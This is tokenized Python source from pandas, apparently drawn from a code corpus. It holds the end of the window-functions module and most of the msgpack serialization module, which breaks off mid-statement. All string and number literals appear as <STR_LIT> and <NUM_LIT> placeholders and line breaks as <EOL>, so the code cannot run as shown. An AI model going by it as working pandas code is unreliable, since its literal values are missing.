columns = frame_template . columns [ result . 
columns ] <EOL> return result <EOL> results = { } <EOL> if isinstance ( arg2 , DataFrame ) : <EOL> if pairwise is False : <EOL> if arg1 is arg2 : <EOL> for i , col in enumerate ( arg1 . columns ) : <EOL> results [ i ] = f ( arg1 . iloc [ : , i ] , arg2 . iloc [ : , i ] ) <EOL> return dataframe_from_int_dict ( results , arg1 ) <EOL> else : <EOL> if not arg1 . columns . is_unique : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if not arg2 . columns . is_unique : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> X , Y = arg1 . align ( arg2 , join = '<STR_LIT>' ) <EOL> X = X + <NUM_LIT:0> * Y <EOL> Y = Y + <NUM_LIT:0> * X <EOL> res_columns = arg1 . columns . union ( arg2 . columns ) <EOL> for col in res_columns : <EOL> if col in X and col in Y : <EOL> results [ col ] = f ( X [ col ] , Y [ col ] ) <EOL> return DataFrame ( results , index = X . index , <EOL> columns = res_columns ) <EOL> elif pairwise is True : <EOL> results = defaultdict ( dict ) <EOL> for i , k1 in enumerate ( arg1 . columns ) : <EOL> for j , k2 in enumerate ( arg2 . columns ) : <EOL> if j < i and arg2 is arg1 : <EOL> results [ i ] [ j ] = results [ j ] [ i ] <EOL> else : <EOL> results [ i ] [ j ] = f ( * _prep_binary ( arg1 . iloc [ : , i ] , <EOL> arg2 . iloc [ : , j ] ) ) <EOL> p = Panel . from_dict ( results ) . swapaxes ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if len ( p . major_axis ) > <NUM_LIT:0> : <EOL> p . major_axis = arg1 . columns [ p . major_axis ] <EOL> if len ( p . minor_axis ) > <NUM_LIT:0> : <EOL> p . minor_axis = arg2 . columns [ p . minor_axis ] <EOL> return p <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> results = { } <EOL> for i , col in enumerate ( arg1 . columns ) : <EOL> results [ i ] = f ( * _prep_binary ( arg1 . 
iloc [ : , i ] , arg2 ) ) <EOL> return dataframe_from_int_dict ( results , arg1 ) <EOL> else : <EOL> return _flex_binary_moment ( arg2 , arg1 , f ) <EOL> def _get_center_of_mass ( com , span , halflife , alpha ) : <EOL> valid_count = len ( [ x for x in [ com , span , halflife , alpha ] <EOL> if x is not None ] ) <EOL> if valid_count > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if com is not None : <EOL> if com < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif span is not None : <EOL> if span < <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> com = ( span - <NUM_LIT:1> ) / <NUM_LIT> <EOL> elif halflife is not None : <EOL> if halflife <= <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> decay = <NUM_LIT:1> - np . exp ( np . log ( <NUM_LIT:0.5> ) / halflife ) <EOL> com = <NUM_LIT:1> / decay - <NUM_LIT:1> <EOL> elif alpha is not None : <EOL> if alpha <= <NUM_LIT:0> or alpha > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> com = ( <NUM_LIT:1.0> - alpha ) / alpha <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return float ( com ) <EOL> def _offset ( window , center ) : <EOL> if not com . is_integer ( window ) : <EOL> window = len ( window ) <EOL> offset = ( window - <NUM_LIT:1> ) / <NUM_LIT> if center else <NUM_LIT:0> <EOL> try : <EOL> return int ( offset ) <EOL> except : <EOL> return offset . astype ( int ) <EOL> def _require_min_periods ( p ) : <EOL> def _check_func ( minp , window ) : <EOL> if minp is None : <EOL> return window <EOL> else : <EOL> return max ( p , minp ) <EOL> return _check_func <EOL> def _use_window ( minp , window ) : <EOL> if minp is None : <EOL> return window <EOL> else : <EOL> return minp <EOL> def _zsqrt ( x ) : <EOL> result = np . sqrt ( x ) <EOL> mask = x < <NUM_LIT:0> <EOL> from pandas import DataFrame <EOL> if isinstance ( x , DataFrame ) : <EOL> if mask . values . any ( ) : <EOL> result [ mask ] = <NUM_LIT:0> <EOL> else : <EOL> if mask . 
any ( ) : <EOL> result [ mask ] = <NUM_LIT:0> <EOL> return result <EOL> def _prep_binary ( arg1 , arg2 ) : <EOL> if not isinstance ( arg2 , type ( arg1 ) ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> X = arg1 + <NUM_LIT:0> * arg2 <EOL> Y = arg2 + <NUM_LIT:0> * arg1 <EOL> return X , Y <EOL> def rolling ( obj , win_type = None , ** kwds ) : <EOL> from pandas import Series , DataFrame <EOL> if not isinstance ( obj , ( Series , DataFrame ) ) : <EOL> raise TypeError ( '<STR_LIT>' % type ( obj ) ) <EOL> if win_type is not None : <EOL> return Window ( obj , win_type = win_type , ** kwds ) <EOL> return Rolling ( obj , ** kwds ) <EOL> rolling . __doc__ = Window . __doc__ <EOL> def expanding ( obj , ** kwds ) : <EOL> from pandas import Series , DataFrame <EOL> if not isinstance ( obj , ( Series , DataFrame ) ) : <EOL> raise TypeError ( '<STR_LIT>' % type ( obj ) ) <EOL> return Expanding ( obj , ** kwds ) <EOL> expanding . __doc__ = Expanding . __doc__ <EOL> def ewm ( obj , ** kwds ) : <EOL> from pandas import Series , DataFrame <EOL> if not isinstance ( obj , ( Series , DataFrame ) ) : <EOL> raise TypeError ( '<STR_LIT>' % type ( obj ) ) <EOL> return EWM ( obj , ** kwds ) <EOL> ewm . __doc__ = EWM . __doc__ </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime , date , timedelta <EOL> from dateutil . parser import parse <EOL> import os <EOL> from textwrap import dedent <EOL> import warnings <EOL> import numpy as np <EOL> from pandas import compat <EOL> from pandas . compat import u , u_safe <EOL> from pandas import ( Timestamp , Period , Series , DataFrame , <EOL> Index , MultiIndex , Float64Index , Int64Index , <EOL> Panel , RangeIndex , PeriodIndex , DatetimeIndex , NaT , <EOL> Categorical ) <EOL> from pandas . tslib import NaTType <EOL> from pandas . sparse . api import SparseSeries , SparseDataFrame , SparsePanel <EOL> from pandas . sparse . array import BlockIndex , IntIndex <EOL> from pandas . core . generic import NDFrame <EOL> from pandas . core . common import ( PerformanceWarning , <EOL> is_categorical_dtype , is_object_dtype , <EOL> needs_i8_conversion , pandas_dtype ) <EOL> from pandas . io . common import get_filepath_or_buffer <EOL> from pandas . core . internals import BlockManager , make_block <EOL> import pandas . core . internals as internals <EOL> from pandas . msgpack import Unpacker as _Unpacker , Packer as _Packer , ExtType <EOL> from pandas . util . _move import ( <EOL> BadMove as _BadMove , <EOL> move_into_mutable_buffer as _move_into_mutable_buffer , <EOL> ) <EOL> try : <EOL> import zlib <EOL> def _check_zlib ( ) : <EOL> pass <EOL> except ImportError : <EOL> def _check_zlib ( ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> _check_zlib . __doc__ = dedent ( <EOL> """<STR_LIT>""" , <EOL> ) <EOL> try : <EOL> import blosc <EOL> def _check_blosc ( ) : <EOL> pass <EOL> except ImportError : <EOL> def _check_blosc ( ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> _check_blosc . __doc__ = dedent ( <EOL> """<STR_LIT>""" , <EOL> ) <EOL> compressor = None <EOL> def to_msgpack ( path_or_buf , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> global compressor <EOL> compressor = kwargs . 
pop ( '<STR_LIT>' , None ) <EOL> if compressor : <EOL> compressor = u ( compressor ) <EOL> append = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if append : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = '<STR_LIT:wb>' <EOL> def writer ( fh ) : <EOL> for a in args : <EOL> fh . write ( pack ( a , ** kwargs ) ) <EOL> if isinstance ( path_or_buf , compat . string_types ) : <EOL> with open ( path_or_buf , mode ) as fh : <EOL> writer ( fh ) <EOL> elif path_or_buf is None : <EOL> buf = compat . BytesIO ( ) <EOL> writer ( buf ) <EOL> return buf . getvalue ( ) <EOL> else : <EOL> writer ( path_or_buf ) <EOL> def read_msgpack ( path_or_buf , encoding = '<STR_LIT:utf-8>' , iterator = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> path_or_buf , _ , _ = get_filepath_or_buffer ( path_or_buf ) <EOL> if iterator : <EOL> return Iterator ( path_or_buf ) <EOL> def read ( fh ) : <EOL> l = list ( unpack ( fh , encoding = encoding , ** kwargs ) ) <EOL> if len ( l ) == <NUM_LIT:1> : <EOL> return l [ <NUM_LIT:0> ] <EOL> return l <EOL> if isinstance ( path_or_buf , compat . string_types ) : <EOL> try : <EOL> exists = os . path . exists ( path_or_buf ) <EOL> except ( TypeError , ValueError ) : <EOL> exists = False <EOL> if exists : <EOL> with open ( path_or_buf , '<STR_LIT:rb>' ) as fh : <EOL> return read ( fh ) <EOL> if isinstance ( path_or_buf , compat . binary_type ) : <EOL> fh = None <EOL> try : <EOL> fh = compat . BytesIO ( path_or_buf ) <EOL> return read ( fh ) <EOL> finally : <EOL> if fh is not None : <EOL> fh . close ( ) <EOL> if hasattr ( path_or_buf , '<STR_LIT>' ) and compat . callable ( path_or_buf . read ) : <EOL> return read ( path_or_buf ) <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> dtype_dict = { <NUM_LIT> : np . dtype ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT>' ) : np . dtype ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT>' ) : np . dtype ( '<STR_LIT>' ) , <EOL> <NUM_LIT> : np . dtype ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT>' ) : np . 
dtype ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT>' ) : np . dtype ( '<STR_LIT>' ) , <EOL> <NUM_LIT:7> : np . dtype ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def dtype_for ( t ) : <EOL> """<STR_LIT>""" <EOL> if t in dtype_dict : <EOL> return dtype_dict [ t ] <EOL> return np . typeDict . get ( t , t ) <EOL> c2f_dict = { '<STR_LIT>' : np . float64 , <EOL> '<STR_LIT>' : np . float64 , <EOL> '<STR_LIT>' : np . float32 } <EOL> if hasattr ( np , '<STR_LIT>' ) : <EOL> c2f_dict [ '<STR_LIT>' ] = np . float128 <EOL> def c2f ( r , i , ctype_name ) : <EOL> """<STR_LIT>""" <EOL> ftype = c2f_dict [ ctype_name ] <EOL> return np . typeDict [ ctype_name ] ( ftype ( r ) + <NUM_LIT> * ftype ( i ) ) <EOL> def convert ( values ) : <EOL> """<STR_LIT>""" <EOL> dtype = values . dtype <EOL> if is_categorical_dtype ( values ) : <EOL> return values <EOL> elif is_object_dtype ( dtype ) : <EOL> return values . ravel ( ) . tolist ( ) <EOL> if needs_i8_conversion ( dtype ) : <EOL> values = values . view ( '<STR_LIT>' ) <EOL> v = values . ravel ( ) <EOL> if compressor == '<STR_LIT>' : <EOL> _check_zlib ( ) <EOL> if dtype == np . object_ : <EOL> return v . tolist ( ) <EOL> v = v . tostring ( ) <EOL> return ExtType ( <NUM_LIT:0> , zlib . compress ( v ) ) <EOL> elif compressor == '<STR_LIT>' : <EOL> _check_blosc ( ) <EOL> if dtype == np . object_ : <EOL> return v . tolist ( ) <EOL> v = v . tostring ( ) <EOL> return ExtType ( <NUM_LIT:0> , blosc . compress ( v , typesize = dtype . itemsize ) ) <EOL> return ExtType ( <NUM_LIT:0> , v . tostring ( ) ) <EOL> def unconvert ( values , dtype , compress = None ) : <EOL> as_is_ext = isinstance ( values , ExtType ) and values . code == <NUM_LIT:0> <EOL> if as_is_ext : <EOL> values = values . data <EOL> if is_categorical_dtype ( dtype ) : <EOL> return values <EOL> elif is_object_dtype ( dtype ) : <EOL> return np . array ( values , dtype = object ) <EOL> dtype = pandas_dtype ( dtype ) . base <EOL> if not as_is_ext : <EOL> values = values . 
encode ( '<STR_LIT>' ) <EOL> if compress : <EOL> if compress == u'<STR_LIT>' : <EOL> _check_zlib ( ) <EOL> decompress = zlib . decompress <EOL> elif compress == u'<STR_LIT>' : <EOL> _check_blosc ( ) <EOL> decompress = blosc . decompress <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> try : <EOL> return np . frombuffer ( <EOL> _move_into_mutable_buffer ( decompress ( values ) ) , <EOL> dtype = dtype , <EOL> ) <EOL> except _BadMove as e : <EOL> values = e . args [ <NUM_LIT:0> ] <EOL> if len ( values ) > <NUM_LIT:1> : <EOL> warnings . warn ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> PerformanceWarning , <EOL> ) <EOL> return np . fromstring ( values , dtype = dtype ) <EOL> def encode ( obj ) : <EOL> """<STR_LIT>""" <EOL> tobj = type ( obj ) <EOL> if isinstance ( obj , Index ) : <EOL> if isinstance ( obj , RangeIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT:start>' : getattr ( obj , '<STR_LIT>' , None ) , <EOL> u'<STR_LIT>' : getattr ( obj , '<STR_LIT>' , None ) , <EOL> u'<STR_LIT>' : getattr ( obj , '<STR_LIT>' , None ) } <EOL> elif isinstance ( obj , PeriodIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT>' : u_safe ( getattr ( obj , '<STR_LIT>' , None ) ) , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . asi8 ) , <EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , DatetimeIndex ) : <EOL> tz = getattr ( obj , '<STR_LIT>' , None ) <EOL> if tz is not None : <EOL> tz = u ( tz . zone ) <EOL> obj = obj . tz_convert ( '<STR_LIT>' ) <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . 
__name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . asi8 ) , <EOL> u'<STR_LIT>' : u_safe ( getattr ( obj , '<STR_LIT>' , None ) ) , <EOL> u'<STR_LIT>' : tz , <EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , MultiIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : getattr ( obj , '<STR_LIT>' , None ) , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . values ) , <EOL> u'<STR_LIT>' : compressor } <EOL> else : <EOL> return { u'<STR_LIT>' : u'<STR_LIT:index>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . values ) , <EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , Categorical ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT>' : obj . codes , <EOL> u'<STR_LIT>' : obj . categories , <EOL> u'<STR_LIT>' : obj . ordered , <EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , Series ) : <EOL> if isinstance ( obj , SparseSeries ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> else : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT:index>' : obj . index , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . 
values ) , <EOL> u'<STR_LIT>' : compressor } <EOL> elif issubclass ( tobj , NDFrame ) : <EOL> if isinstance ( obj , SparseDataFrame ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> elif isinstance ( obj , SparsePanel ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> else : <EOL> data = obj . _data <EOL> if not data . is_consolidated ( ) : <EOL> data = data . consolidate ( ) <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : data . axes , <EOL> u'<STR_LIT>' : [ { u'<STR_LIT>' : b . mgr_locs . as_array , <EOL> u'<STR_LIT>' : convert ( b . values ) , <EOL> u'<STR_LIT>' : b . values . shape , <EOL> u'<STR_LIT>' : u ( b . dtype . name ) , <EOL> u'<STR_LIT>' : u ( b . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : compressor } for b in data . blocks ] <EOL> } <EOL> elif isinstance ( obj , ( datetime , date , np . datetime64 , timedelta , <EOL> np . timedelta64 , NaTType ) ) : <EOL> if isinstance ( obj , Timestamp ) : <EOL> tz = obj . tzinfo <EOL> if tz is not None : <EOL> tz = u ( tz . zone ) <EOL> offset = obj . offset <EOL> if offset is not None : <EOL> offset = u ( offset . freqstr ) <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:value>' : obj . value , <EOL> u'<STR_LIT>' : offset , <EOL> u'<STR_LIT>' : tz } <EOL> if isinstance ( obj , NaTType ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' } <EOL> elif isinstance ( obj , np . timedelta64 ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:data>' : obj . view ( '<STR_LIT>' ) } <EOL> elif isinstance ( obj , timedelta ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:data>' : ( obj . days , obj . seconds , obj . microseconds ) } <EOL> elif isinstance ( obj , np . 
datetime64 ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:data>' : u ( str ( obj ) ) } <EOL> elif isinstance ( obj , datetime ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:data>' : u ( obj . isoformat ( ) ) } <EOL> elif isinstance ( obj , date ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT:date>' , <EOL> u'<STR_LIT:data>' : u ( obj . isoformat ( ) ) } <EOL> raise Exception ( "<STR_LIT>" % obj ) <EOL> elif isinstance ( obj , Period ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : obj . ordinal , <EOL> u'<STR_LIT>' : u ( obj . freq ) } <EOL> elif isinstance ( obj , BlockIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : obj . blocs , <EOL> u'<STR_LIT>' : obj . blengths , <EOL> u'<STR_LIT>' : obj . length } <EOL> elif isinstance ( obj , IntIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : obj . indices , <EOL> u'<STR_LIT>' : obj . length } <EOL> elif isinstance ( obj , np . ndarray ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : obj . shape , <EOL> u'<STR_LIT>' : obj . ndim , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj ) , <EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , np . number ) : <EOL> if np . iscomplexobj ( obj ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT>' : u ( obj . real . __repr__ ( ) ) , <EOL> u'<STR_LIT>' : u ( obj . imag . __repr__ ( ) ) } <EOL> else : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : u ( obj . __repr__ ( ) ) } <EOL> elif isinstance ( obj , complex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . real . 
__repr__ ( ) ) , <EOL> u'<STR_LIT>' : u ( obj . imag . __repr__ ( ) ) } <EOL> return obj <EOL> def decode ( obj ) : <EOL> """<STR_LIT>""" <EOL> typ = obj . get ( u'<STR_LIT>' ) <EOL> if typ is None : <EOL> return obj <EOL> elif typ == u'<STR_LIT>' : <EOL> return Timestamp ( obj [ u'<STR_LIT:value>' ] , tz = obj [ u'<STR_LIT>' ] , offset = obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return NaT <EOL> elif typ == u'<STR_LIT>' : <EOL> return Period ( ordinal = obj [ u'<STR_LIT>' ] , freq = obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT:index>' : <EOL> dtype = dtype_for ( obj [ u'<STR_LIT>' ] ) <EOL> data = unconvert ( obj [ u'<STR_LIT:data>' ] , dtype , <EOL> obj . get ( u'<STR_LIT>' ) ) <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( data , dtype = dtype , name = obj [ u'<STR_LIT:name>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( obj [ u'<STR_LIT:start>' ] , <EOL> obj [ u'<STR_LIT>' ] , <EOL> obj [ u'<STR_LIT>' ] , <EOL> name = obj [ u'<STR_LIT:name>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> dtype = dtype_for ( obj [ u'<STR_LIT>' ] ) <EOL> data = unconvert ( obj [ u'<STR_LIT:data>' ] , dtype , <EOL> obj . get ( u'<STR_LIT>' ) ) <EOL> data = [ tuple ( x ) for x in data ] <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] . from_tuples ( data , names = obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> data = unconvert ( obj [ u'<STR_LIT:data>' ] , np . int64 , obj . get ( u'<STR_LIT>' ) ) <EOL> d = dict ( name = obj [ u'<STR_LIT:name>' ] , freq = obj [ u'<STR_LIT>' ] ) <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( data , ** d ) <EOL> elif typ == u'<STR_LIT>' : <EOL> data = unconvert ( obj [ u'<STR_LIT:data>' ] , np . int64 , obj . 
get ( u'<STR_LIT>' ) ) <EOL> d = dict ( name = obj [ u'<STR_LIT:name>' ] , freq = obj [ u'<STR_LIT>' ] , verify_integrity = False ) <EOL> result = globals ( ) [ obj [ u'<STR_LIT>' ] ] ( data , ** d ) <EOL> tz = obj [ u'<STR_LIT>' ] <EOL> if tz is not None : <EOL> result = result . tz_localize ( '<STR_LIT>' ) . tz_convert ( tz ) <EOL> return result <EOL> elif typ == u'<STR_LIT>' : <EOL> from_codes = globals ( ) [ obj [ u'<STR_LIT>' ] ] . from_codes <EOL> return from_codes ( codes = obj [ u'<STR_LIT>' ] , <EOL> categories = obj [ u'<STR_LIT>' ] , <EOL> ordered = obj [ u'<STR_LIT>' ] , <EOL> name = obj [ u'<STR_LIT:name>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> dtype = dtype_for ( obj [ u'<STR_LIT>' ] ) <EOL> pd_dtype = pandas_dtype ( dtype ) <EOL> np_dtype = pandas_dtype ( dtype ) . base <EOL> index = obj [ u'<STR_LIT:index>' ] <EOL> result = globals ( ) [ obj [ u'<STR_LIT>' ] ] ( unconvert ( obj [ u'<STR_LIT:data>' ] , dtype , <EOL> obj [ u'<STR_LIT>' ] ) , <EOL> index = index , <EOL> dtype = np_dtype , <EOL> name = obj [ u'<STR_LIT:name>' ] ) <EOL> tz = getattr ( pd_dtype , '<STR_LIT>' , None ) <EOL> if tz : <EOL> result = result . dt . tz_localize ( '<STR_LIT>' ) . dt . tz_convert ( tz ) <EOL> return result <EOL> elif typ == u'<STR_LIT>' : <EOL> axes = obj [ u'<STR_LIT>' ] <EOL> def create_block ( b ) : <EOL> values = unconvert ( b [ u'<STR_LIT>' ] , dtype_for ( b [ u'<STR_LIT>' ] ) , <EOL> b [ u'<STR_LIT>' ] ) . reshape ( b [ u'<STR_LIT>' ] ) <EOL> if u'<STR_LIT>' in b : <EOL> placement = b [ u'<STR_LIT>' ] <EOL> else : <EOL> placement = axes [ <NUM_LIT:0> ] . 
get_indexer ( b [ u'<STR_LIT>' ] ) <EOL> return make_block ( values = values , <EOL> klass = getattr ( internals , b [ u'<STR_LIT>' ] ) , <EOL> placement = placement , <EOL> dtype = b [ u'<STR_LIT>' ] ) <EOL> blocks = [ create_block ( b ) for b in obj [ u'<STR_LIT>' ] ] <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( BlockManager ( blocks , axes ) ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return parse ( obj [ u'<STR_LIT:data>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return np . datetime64 ( parse ( obj [ u'<STR_LIT:data>' ] ) ) <EOL> elif typ == u'<STR_LIT:date>' : <EOL> return parse ( obj [ u'<STR_LIT:data>' ] ) . date ( ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return timedelta ( * obj [ u'<STR_LIT:data>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return np . timedelta64 ( int ( obj [ u'<STR_LIT:data>' ] ) ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( obj [ u'<STR_LIT>' ] , obj [ u'<STR_LIT>' ] , <EOL> obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return globals ( ) [ obj [ u'<STR_LIT>' ] ] ( obj [ u'<STR_LIT>' ] , obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return unconvert ( obj [ u'<STR_LIT:data>' ] , np . typeDict [ obj [ u'<STR_LIT>' ] ] , <EOL> obj . get ( u'<STR_LIT>' ) ) . reshape ( obj [ u'<STR_LIT>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> if obj . get ( u'<STR_LIT>' ) == u'<STR_LIT>' : <EOL> return c2f ( obj [ u'<STR_LIT>' ] , obj [ u'<STR_LIT>' ] , obj [ u'<STR_LIT>' ] ) <EOL> else : <EOL> dtype = dtype_for ( obj [ u'<STR_LIT>' ] ) <EOL> try : <EOL> return dtype ( obj [ u'<STR_LIT:data>' ] ) <EOL> except : <EOL> return dtype . 
type ( obj [ u'<STR_LIT:data>' ] ) <EOL> elif typ == u'<STR_LIT>' : <EOL> return complex ( obj [ u'<STR_LIT>' ] + u'<STR_LIT:+>' + obj [ u'<STR_LIT>' ] + u'<STR_LIT>' ) <EOL> elif isinstance ( obj , ( dict , list , set ) ) : <EOL> return obj <EOL> else : <EOL> return obj <EOL> def pack ( o , default = encode , <EOL> encoding = '<STR_LIT:utf-8>' , unicode_errors = '<STR_LIT:strict>' , use_single_float = False , <EOL> autoreset = <NUM_LIT:1> , use_bin_type = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return Packer ( default = default , encoding = encoding , <EOL> unicode_errors = unicode_errors , <EOL> use_single_float = use_single_float , <EOL> autoreset = autoreset , <EOL> use_bin_type = use_bin_type ) . pack ( o ) <EOL> def unpack ( packed , object_hook = decode , <EOL> list_hook = None , use_list = False , encoding = '<STR_LIT:utf-8>' , <EOL> unicode_errors = '<STR_LIT:strict>' , object_pairs_hook = None , <EOL> max_buffer_size = <NUM_LIT:0> , ext_hook = ExtType ) : <EOL> """<STR_LIT>""" <EOL> return Unpacker ( packed , object_hook = object_hook , <EOL> list_hook = list_hook , <EOL> use_list = use_list , encoding = encoding , <EOL> unicode_errors = unicode_errors , <EOL> object_pairs_hook = object_pairs_hook , <EOL> max_buffer_size = max_buffer_size , <EOL> ext_hook = ext_hook ) <EOL> class Packer ( _Packer ) : <EOL> def __init__ ( self , default = encode , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> unicode_errors = '<STR_LIT:strict>' , <EOL> use_single_float = False , <EOL> autoreset = <NUM_LIT:1> , <EOL> use_bin_type = <NUM_LIT:1> ) : <EOL> super ( Packer , self ) . 
